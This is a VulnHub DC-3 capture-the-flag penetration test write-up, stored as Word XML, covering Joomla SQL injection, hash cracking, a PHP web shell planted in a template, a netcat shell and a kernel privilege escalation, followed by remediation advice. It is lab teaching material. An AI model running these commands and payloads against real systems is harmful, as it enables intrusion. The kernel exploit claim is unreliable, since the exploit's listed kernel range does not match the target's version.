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C0392B"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNHUB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CTF PENETRATION TEST WRITE-UP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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Target Machine: DC-3  |  Difficulty: Intermediate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ABB2B9"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: May 27, 2025  |  Author: Pavan Darade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="1400"/>
      </w:pP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DC-3 hosts a Joomla 3.7.0 CMS vulnerable to SQL injection (CVE-2017-8917). Exploitation yielded admin credentials, followed by uploading a PHP reverse shell. Root was obtained via a Linux kernel exploit (overlayfs privilege escalation).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Machine Name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DC-3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VulnHub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OS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(Ubuntu 16.04)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Flags Captured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/ 1  (Root Flag)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Root Access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Test Date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27, 2025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Tester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Pavan Darade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t xml:space="preserve">2. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1  Port Scanning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nmap -sV -sC -p- 192.168.56.104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80/tcp  open  http  Apache httpd 2.4.18 (Joomla)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2  CMS Fingerprinting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Joomscan identified the exact Joomla version as 3.7.0.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joomscan -u http://192.168.56.104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[+] Joomla version: 3.7.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Exploitation — CVE-2017-8917 (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1  sqlmap Exploitation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Joomla 3.7.0 is vulnerable to a SQL injection in the com_fields component. sqlmap was used to extract the admin hash.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sqlmap -u "http://192.168.56.104/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]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sqlmap [...] -D joomladb --tables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sqlmap [...] -D joomladb -T '#__users' --dump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[+] admin : $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2  Hash Cracking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john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt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[+] Cracked: snoopy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3  PHP Reverse Shell Upload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access to Joomla was used to edit a template PHP file and inject a reverse shell.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Admin Panel &gt; Extensions &gt; Templates &gt; Beez3 &gt; error.php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Injected: &lt;?php system($_GET['cmd']); ?&gt;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curl http://192.168.56.104/templates/beez3/error.php?cmd=id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uid=33(www-data) gid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4  Stable Shell via netcat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nc -lvnp 4444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[shell payload triggered via curl]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python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Privilege Escalation — Kernel Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1  Kernel Version Check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uname -a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Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2  OverlayFS Local Privilege Escalation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kernel version 4.4.0-21 is vulnerable to CVE-2015-1328 (OverlayFS LPE). The exploit was compiled and executed on the target.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searchsploit overlayfs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Linux Kernel 3.13.0 &lt; 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs LPE | 37292.c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 gcc 37292.c -o exploit &amp;&amp; ./exploit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root@DC-3:/# id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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="C0392B" w:sz="12"/>
        </w:pBd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FLAG: flag{d6160ce303...} — /root/the-flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Flag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30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Flag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Root Flag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/root/the-flag.txt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OverlayFS kernel exploit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Hard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t xml:space="preserve">6. Vulnerability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1400"/>
        <w:gridCol w:w="1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Vulnerability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CVSS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CVE-2017-8917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Joomla 3.7.0 SQLi in com_fields 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9.8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CVE-2015-1328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Linux kernel OverlayFS privilege escalation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7.8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Weak Admin Password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Admin hash cracked via rockyou.txt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Template File Write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Admin panel allows arbitrary PHP upload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8.1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t xml:space="preserve">7.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Upgrade Joomla immediately to the latest stable version.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Apply OS and kernel patches — keep Ubuntu fully updated.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Enforce strong passwords and enable 2FA on CMS admin accounts.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Restrict template editing in the Joomla admin panel.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a WAF to detect and block SQL injection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Tools &amp;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Nmap, Joomscan, sqlmap — Recon and exploitation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John the Ripper — Password hash cracking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Exploit-DB (37292.c) — OverlayFS kernel exploit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CVE-2017-8917 — https://nvd.nist.gov/vuln/detail/CVE-2017-8917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VulnHub DC-3 — https://www.vulnhub.com/entry/dc-32,312/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Disclaimer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write-up was created solely for educational purposes as part of a CTF exercise on VulnHub. All testing was conducted in an isolated lab environment. Do not use these techniques against systems without explicit written authorisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pP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ABB2B9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Report — VulnHub DC-3 CTF Write-Up — Pavan Darade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4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Pavan Darade</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page #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VulnHub DC-3 CTF Write-Up</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="ABB2B9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4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C0392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922B2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2026-05-27T13:49:20.686Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-27T13:49:20.686Z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